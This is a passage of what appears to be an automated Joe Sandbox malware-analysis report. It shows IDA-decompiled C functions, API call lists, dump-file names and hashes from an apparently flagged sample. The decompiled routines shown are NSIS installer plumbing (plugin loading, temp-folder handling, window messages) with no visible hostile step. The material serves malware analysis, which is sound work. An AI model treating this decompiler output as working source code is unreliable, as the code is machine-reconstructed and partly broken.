                                                                                                                          				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                                                                          				_t7 = GetProcAddress(_a4, _t10);
                                                                                                                          				GlobalFree(_t10);
                                                                                                                          				return _t7;
                                                                                                                          			}






                                                                                                                          0x714616d7
                                                                                                                          0x714616e3
                                                                                                                          0x714616f0
                                                                                                                          0x714616f7
                                                                                                                          0x71461700
                                                                                                                          0x7146170c

                                                                                                                          APIs
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,714622D8,?,00000808), ref: 714616D5
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,714622D8,?,00000808), ref: 714616DC
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,714622D8,?,00000808), ref: 714616F0
                                                                                                                          • GetProcAddress.KERNEL32(714622D8,00000000), ref: 714616F7
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 71461700
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33069504467.0000000071461000.00000020.00000001.01000000.00000005.sdmp, Offset: 71460000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33069452109.0000000071460000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069570468.0000000071464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069617155.0000000071466000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_71460000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1148316912-0
                                                                                                                          • Opcode ID: 669cc94a4c4828331d2593cde65ed753ff91f11f55f1a6f98ace11618788502c
                                                                                                                          • Instruction ID: 95849a873e8b0c19fbf8f158397adfba56d62c8bfb59093241a20d6b1023a780
                                                                                                                          • Opcode Fuzzy Hash: 669cc94a4c4828331d2593cde65ed753ff91f11f55f1a6f98ace11618788502c
                                                                                                                          • Instruction Fuzzy Hash: A1F0A27310A1387BDA211AE78C4CD9B7E9CDF8B6F9B150215F618961A0C5615D01D7F1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 59%
                                                                                                                          			E00401C43(intOrPtr __edx) {
                                                                                                                          				int _t29;
                                                                                                                          				long _t30;
                                                                                                                          				signed int _t32;
                                                                                                                          				WCHAR* _t35;
                                                                                                                          				long _t36;
                                                                                                                          				int _t41;
                                                                                                                          				signed int _t42;
                                                                                                                          				int _t46;
                                                                                                                          				int _t56;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				struct HWND__* _t63;
                                                                                                                          				void* _t64;
                                                                                                                          
                                                                                                                          				_t57 = __edx;
                                                                                                                          				_t29 = E00402D84(3);
                                                                                                                          				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                          				 *(_t64 - 0x18) = _t29;
                                                                                                                          				_t30 = E00402D84(4);
                                                                                                                          				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                          				 *(_t64 + 8) = _t30;
                                                                                                                          				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                                                                          					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                                                                          				}
                                                                                                                          				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                                                                          				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                                                                          					 *(_t64 + 8) = E00402DA6(0x44);
                                                                                                                          				}
                                                                                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                                                                          				_push(1);
                                                                                                                          				if(__eflags != 0) {
                                                                                                                          					_t61 = E00402DA6();
                                                                                                                          					_t32 = E00402DA6();
                                                                                                                          					asm("sbb ecx, ecx");
                                                                                                                          					asm("sbb eax, eax");
                                                                                                                          					_t35 =  ~( *_t31) & _t61;
                                                                                                                          					__eflags = _t35;
                                                                                                                          					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                                                          					goto L10;
                                                                                                                          				} else {
                                                                                                                          					_t63 = E00402D84();
                                                                                                                          					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                          					_t41 = E00402D84(2);
                                                                                                                          					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                          					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                                                                          					if(__eflags == 0) {
                                                                                                                          						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                                                                          						L10:
                                                                                                                          						 *(_t64 - 0x38) = _t36;
                                                                                                                          					} else {
                                                                                                                          						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                                                                          						asm("sbb eax, eax");
                                                                                                                          						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                                                                          				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                                                                          					_push( *(_t64 - 0x38));
                                                                                                                          					E004065AF();
                                                                                                                          				}
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}















                                                                                                                          0x00401c43
                                                                                                                          0x00401c45
                                                                                                                          0x00401c4c
                                                                                                                          0x00401c4f
                                                                                                                          0x00401c52
                                                                                                                          0x00401c5c
                                                                                                                          0x00401c60
                                                                                                                          0x00401c63
                                                                                                                          0x00401c6c
                                                                                                                          0x00401c6c
                                                                                                                          0x00401c6f
                                                                                                                          0x00401c73
                                                                                                                          0x00401c7c
                                                                                                                          0x00401c7c
                                                                                                                          0x00401c7f
                                                                                                                          0x00401c83
                                                                                                                          0x00401c85
                                                                                                                          0x00401cda
                                                                                                                          0x00401cdc
                                                                                                                          0x00401ce7
                                                                                                                          0x00401cf1
                                                                                                                          0x00401cf4
                                                                                                                          0x00401cf4
                                                                                                                          0x00401cfd
                                                                                                                          0x00000000
                                                                                                                          0x00401c87
                                                                                                                          0x00401c8e
                                                                                                                          0x00401c90
                                                                                                                          0x00401c93
                                                                                                                          0x00401c99
                                                                                                                          0x00401ca0
                                                                                                                          0x00401ca3
                                                                                                                          0x00401ccb
                                                                                                                          0x00401d03
                                                                                                                          0x00401d03
                                                                                                                          0x00401ca5
                                                                                                                          0x00401cb3
                                                                                                                          0x00401cbb
                                                                                                                          0x00401cbe
                                                                                                                          0x00401cbe
                                                                                                                          0x00401ca3
                                                                                                                          0x00401d06
                                                                                                                          0x00401d09
                                                                                                                          0x00401d0f
                                                                                                                          0x00402ba4
                                                                                                                          0x00402ba4
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                                                          • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                                                          • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                                                          • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E00405F37(WCHAR* _a4) {
                                                                                                                          				WCHAR* _t9;
                                                                                                                          
                                                                                                                          				_t9 = _a4;
                                                                                                                          				_push( &(_t9[lstrlenW(_t9)]));
                                                                                                                          				_push(_t9);
                                                                                                                          				if( *(CharPrevW()) != 0x5c) {
                                                                                                                          					lstrcatW(_t9, 0x40a014);
                                                                                                                          				}
                                                                                                                          				return _t9;
                                                                                                                          			}




                                                                                                                          0x00405f38
                                                                                                                          0x00405f45
                                                                                                                          0x00405f46
                                                                                                                          0x00405f51
                                                                                                                          0x00405f59
                                                                                                                          0x00405f59
                                                                                                                          0x00405f61

                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                          • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                          • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                                                          • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                          • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E714610E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                                                                                          				void* _v0;
                                                                                                                          				void* _t27;
                                                                                                                          				signed int _t29;
                                                                                                                          				void* _t30;
                                                                                                                          				void* _t34;
                                                                                                                          				void* _t36;
                                                                                                                          				void* _t38;
                                                                                                                          				void* _t40;
                                                                                                                          				void* _t48;
                                                                                                                          				void* _t54;
                                                                                                                          				void* _t63;
                                                                                                                          				void* _t64;
                                                                                                                          				signed int _t66;
                                                                                                                          				void* _t67;
                                                                                                                          				void* _t73;
                                                                                                                          				void* _t74;
                                                                                                                          				void* _t77;
                                                                                                                          				void* _t80;
                                                                                                                          				void _t81;
                                                                                                                          				void _t82;
                                                                                                                          				intOrPtr _t84;
                                                                                                                          				void* _t86;
                                                                                                                          				void* _t88;
                                                                                                                          
                                                                                                                          				 *0x7146506c = _a8;
                                                                                                                          				 *0x71465070 = _a16;
                                                                                                                          				 *0x71465074 = _a12;
                                                                                                                          				_a12( *0x71465048, E71461651, _t73);
                                                                                                                          				_t66 =  *0x7146506c +  *0x7146506c * 4 << 3;
                                                                                                                          				_t27 = E714612E3();
                                                                                                                          				_v0 = _t27;
                                                                                                                          				_t74 = _t27;
                                                                                                                          				if( *_t27 == 0) {
                                                                                                                          					L28:
                                                                                                                          					return GlobalFree(_t27);
                                                                                                                          				}
                                                                                                                          				do {
                                                                                                                          					_t29 =  *_t74 & 0x0000ffff;
                                                                                                                          					_t67 = 2;
                                                                                                                          					_t74 = _t74 + _t67;
                                                                                                                          					_t88 = _t29 - 0x66;
                                                                                                                          					if(_t88 > 0) {
                                                                                                                          						_t30 = _t29 - 0x6c;
                                                                                                                          						if(_t30 == 0) {
                                                                                                                          							L23:
                                                                                                                          							_t31 =  *0x71465040;
                                                                                                                          							if( *0x71465040 == 0) {
                                                                                                                          								goto L26;
                                                                                                                          							}
                                                                                                                          							E71461603( *0x71465074, _t31 + 4, _t66);
                                                                                                                          							_t34 =  *0x71465040;
                                                                                                                          							_t86 = _t86 + 0xc;
                                                                                                                          							 *0x71465040 =  *_t34;
                                                                                                                          							L25:
                                                                                                                          							GlobalFree(_t34);
                                                                                                                          							goto L26;
                                                                                                                          						}
                                                                                                                          						_t36 = _t30 - 4;
                                                                                                                          						if(_t36 == 0) {
                                                                                                                          							L13:
                                                                                                                          							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                                                          							_t74 = _t74 + _t67;
                                                                                                                          							_t34 = E71461312(E7146135A(_t38));
                                                                                                                          							L14:
                                                                                                                          							goto L25;
                                                                                                                          						}
                                                                                                                          						_t40 = _t36 - _t67;
                                                                                                                          						if(_t40 == 0) {
                                                                                                                          							L11:
                                                                                                                          							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                                                          							_t74 = _t74 + _t67;
                                                                                                                          							_t34 = E71461381(_t80, E714612E3());
                                                                                                                          							goto L14;
                                                                                                                          						}
                                                                                                                          						L8:
                                                                                                                          						if(_t40 == 1) {
                                                                                                                          							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                                                                                          							_t10 = _t81 + 4; // 0x4
                                                                                                                          							E71461603(_t10,  *0x71465074, _t66);
                                                                                                                          							_t86 = _t86 + 0xc;
                                                                                                                          							 *_t81 =  *0x71465040;
                                                                                                                          							 *0x71465040 = _t81;
                                                                                                                          						}
                                                                                                                          						goto L26;
                                                                                                                          					}
                                                                                                                          					if(_t88 == 0) {
                                                                                                                          						_t48 =  *0x71465070;
                                                                                                                          						_t77 =  *_t48;
                                                                                                                          						 *_t48 =  *_t77;
                                                                                                                          						_t49 = _v0;
                                                                                                                          						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                                                                                          						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                                                                                          							E71461603(_t49, _t77 + 8, 0x38);
                                                                                                                          							_t86 = _t86 + 0xc;
                                                                                                                          						}
                                                                                                                          						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                                                                                          						GlobalFree(_t77);
                                                                                                                          						goto L26;
                                                                                                                          					}
                                                                                                                          					_t54 = _t29 - 0x46;
                                                                                                                          					if(_t54 == 0) {
                                                                                                                          						_t82 = GlobalAlloc(0x40,  *0x7146506c +  *0x7146506c + 8);
                                                                                                                          						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                                                                                          						_t14 = _t82 + 8; // 0x8
                                                                                                                          						E71461603(_t14, _v0, 0x38);
                                                                                                                          						_t86 = _t86 + 0xc;
                                                                                                                          						 *_t82 =  *( *0x71465070);
                                                                                                                          						 *( *0x71465070) = _t82;
                                                                                                                          						goto L26;
                                                                                                                          					}
                                                                                                                          					_t63 = _t54 - 6;
                                                                                                                          					if(_t63 == 0) {
                                                                                                                          						goto L23;
                                                                                                                          					}
                                                                                                                          					_t64 = _t63 - 4;
                                                                                                                          					if(_t64 == 0) {
                                                                                                                          						 *_t74 =  *_t74 + 0xa;
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          					_t40 = _t64 - _t67;
                                                                                                                          					if(_t40 == 0) {
                                                                                                                          						 *_t74 =  *_t74 + 0xa;
                                                                                                                          						goto L11;
                                                                                                                          					}
                                                                                                                          					goto L8;
                                                                                                                          					L26:
                                                                                                                          				} while ( *_t74 != 0);
                                                                                                                          				_t27 = _v0;
                                                                                                                          				goto L28;
                                                                                                                          			}


























                                                                                                                          0x714610eb
                                                                                                                          0x71461100
                                                                                                                          0x71461109
                                                                                                                          0x7146110e
                                                                                                                          0x71461119
                                                                                                                          0x7146111c
                                                                                                                          0x71461125
                                                                                                                          0x71461129
                                                                                                                          0x7146112b
                                                                                                                          0x714612b0
                                                                                                                          0x714612ba
                                                                                                                          0x714612ba
                                                                                                                          0x71461132
                                                                                                                          0x71461132
                                                                                                                          0x71461137
                                                                                                                          0x71461138
                                                                                                                          0x7146113a
                                                                                                                          0x7146113d
                                                                                                                          0x71461256
                                                                                                                          0x71461259
                                                                                                                          0x71461271
                                                                                                                          0x71461271
                                                                                                                          0x71461278
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71461285
                                                                                                                          0x7146128a
                                                                                                                          0x7146128f
                                                                                                                          0x71461294
                                                                                                                          0x7146129a
                                                                                                                          0x7146129b
                                                                                                                          0x00000000
                                                                                                                          0x7146129b
                                                                                                                          0x7146125b
                                                                                                                          0x7146125e
                                                                                                                          0x714611bc
                                                                                                                          0x714611bf
                                                                                                                          0x714611c2
                                                                                                                          0x714611cb
                                                                                                                          0x714611d0
                                                                                                                          0x00000000
                                                                                                                          0x714611d1
                                                                                                                          0x71461264
                                                                                                                          0x71461266
                                                                                                                          0x714611a2
                                                                                                                          0x714611a5
                                                                                                                          0x714611a8
                                                                                                                          0x714611b1
                                                                                                                          0x00000000
                                                                                                                          0x714611b1
                                                                                                                          0x71461164
                                                                                                                          0x71461165
                                                                                                                          0x71461177
                                                                                                                          0x71461180
                                                                                                                          0x71461184
                                                                                                                          0x7146118e
                                                                                                                          0x71461191
                                                                                                                          0x71461193
                                                                                                                          0x71461193
                                                                                                                          0x00000000
                                                                                                                          0x71461165
                                                                                                                          0x71461143
                                                                                                                          0x71461218
                                                                                                                          0x7146121d
                                                                                                                          0x71461221
                                                                                                                          0x71461223
                                                                                                                          0x7146122c
                                                                                                                          0x7146122f
                                                                                                                          0x71461238
                                                                                                                          0x7146123d
                                                                                                                          0x7146123d
                                                                                                                          0x71461247
                                                                                                                          0x7146124a
                                                                                                                          0x00000000
                                                                                                                          0x71461250
                                                                                                                          0x71461149
                                                                                                                          0x7146114c
                                                                                                                          0x714611e9
                                                                                                                          0x714611ed
                                                                                                                          0x714611f7
                                                                                                                          0x714611fb
                                                                                                                          0x71461205
                                                                                                                          0x7146120a
                                                                                                                          0x71461211
                                                                                                                          0x00000000
                                                                                                                          0x71461211
                                                                                                                          0x71461152
                                                                                                                          0x71461155
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x7146115b
                                                                                                                          0x7146115e
                                                                                                                          0x714611b8
                                                                                                                          0x00000000
                                                                                                                          0x714611b8
                                                                                                                          0x71461160
                                                                                                                          0x71461162
                                                                                                                          0x7146119e
                                                                                                                          0x00000000
                                                                                                                          0x7146119e
                                                                                                                          0x00000000
                                                                                                                          0x714612a1
                                                                                                                          0x714612a1
                                                                                                                          0x714612ab
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 71461171
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 714611E3
                                                                                                                          • GlobalFree.KERNEL32 ref: 7146124A
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 7146129B
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 714612B1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33069504467.0000000071461000.00000020.00000001.01000000.00000005.sdmp, Offset: 71460000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33069452109.0000000071460000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069570468.0000000071464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069617155.0000000071466000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_71460000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1780285237-0
                                                                                                                          • Opcode ID: 57fad584e2b94e7d13bb8466b706da17d1cf92ff801bda320ef1ece5cd06e658
                                                                                                                          • Instruction ID: 733fb800b779ea3a7a9c6b60e20e0c743ed729d9a94493eadf05534d963b47ab
                                                                                                                          • Opcode Fuzzy Hash: 57fad584e2b94e7d13bb8466b706da17d1cf92ff801bda320ef1ece5cd06e658
                                                                                                                          • Instruction Fuzzy Hash: A5518CF6908202DFE701CF69C944A667BBCFB98B5DB14451AF946EF220E734E941CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                                                                                          				signed int _t14;
                                                                                                                          				int _t17;
                                                                                                                          				void* _t24;
                                                                                                                          				intOrPtr* _t29;
                                                                                                                          				void* _t31;
                                                                                                                          				signed int _t32;
                                                                                                                          				void* _t35;
                                                                                                                          				void* _t40;
                                                                                                                          				signed int _t42;
                                                                                                                          
                                                                                                                          				_t29 = __edi;
                                                                                                                          				_t24 = __ebx;
                                                                                                                          				_t14 =  *(_t35 - 0x28);
                                                                                                                          				_t40 = __edx - 0x38;
                                                                                                                          				 *(_t35 - 0x10) = _t14;
                                                                                                                          				_t27 = 0 | _t40 == 0x00000000;
                                                                                                                          				_t32 = _t40 == 0;
                                                                                                                          				if(_t14 == __ebx) {
                                                                                                                          					if(__edx != 0x38) {
                                                                                                                          						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                                                                                          					} else {
                                                                                                                          						E00402DA6(0x21);
                                                                                                                          						E0040668A("C:\Users\Arthur\AppData\Local\Temp\nsxD40A.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsxD40A.tmp\System.dll", 0x400);
                                                                                                                          						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsxD40A.tmp\System.dll");
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					E00402D84(1);
                                                                                                                          					 *0x40adf8 = __ax;
                                                                                                                          					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                                                                                          				}
                                                                                                                          				 *(_t35 + 8) = _t17;
                                                                                                                          				if( *_t29 == _t24) {
                                                                                                                          					L13:
                                                                                                                          					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                                                          				} else {
                                                                                                                          					_t31 = E004065C8(_t27, _t29);
                                                                                                                          					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
                                                                                                                          						_t14 = E0040620A(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsxD40A.tmp\System.dll",  *(_t35 + 8));
                                                                                                                          						_t42 = _t14;
                                                                                                                          						if(_t42 == 0) {
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          0x0040263e
                                                                                                                          0x0040263e
                                                                                                                          0x0040263e
                                                                                                                          0x00402643
                                                                                                                          0x00402646
                                                                                                                          0x00402649
                                                                                                                          0x0040264e
                                                                                                                          0x00402650
                                                                                                                          0x00402670
                                                                                                                          0x004026aa
                                                                                                                          0x00402672
                                                                                                                          0x00402674
                                                                                                                          0x00402688
                                                                                                                          0x00402695
                                                                                                                          0x00402695
                                                                                                                          0x00402652
                                                                                                                          0x00402654
                                                                                                                          0x00402659
                                                                                                                          0x00402667
                                                                                                                          0x0040266a
                                                                                                                          0x004026af
                                                                                                                          0x004026b2
                                                                                                                          0x0040292e
                                                                                                                          0x0040292e
                                                                                                                          0x004026b8
                                                                                                                          0x004026c1
                                                                                                                          0x004026c3
                                                                                                                          0x004026e2
                                                                                                                          0x004015b4
                                                                                                                          0x004015b6
                                                                                                                          0x00000000
                                                                                                                          0x004015bc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004026c3
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll), ref: 00402695
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp$C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll
                                                                                                                          • API String ID: 1659193697-1599165232
                                                                                                                          • Opcode ID: 5b3ce15bae92b0a45d22bacae98ccbf5a116735e7895fe61414905b7ba97b97c
                                                                                                                          • Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
                                                                                                                          • Opcode Fuzzy Hash: 5b3ce15bae92b0a45d22bacae98ccbf5a116735e7895fe61414905b7ba97b97c
                                                                                                                          • Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403C25() {
                                                                                                                          				void* _t1;
                                                                                                                          				void* _t2;
                                                                                                                          				signed int _t11;
                                                                                                                          
                                                                                                                          				_t1 =  *0x40a018; // 0x2e4
                                                                                                                          				if(_t1 != 0xffffffff) {
                                                                                                                          					CloseHandle(_t1);
                                                                                                                          					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                                                                          				}
                                                                                                                          				_t2 =  *0x40a01c; // 0x2f8
                                                                                                                          				if(_t2 != 0xffffffff) {
                                                                                                                          					CloseHandle(_t2);
                                                                                                                          					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                                                                          					_t11 =  *0x40a01c;
                                                                                                                          				}
                                                                                                                          				E00403C82();
                                                                                                                          				return E00405D74(_t11, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\nsxD40A.tmp", 7);
                                                                                                                          			}






                                                                                                                          0x00403c25
                                                                                                                          0x00403c34
                                                                                                                          0x00403c37
                                                                                                                          0x00403c39
                                                                                                                          0x00403c39
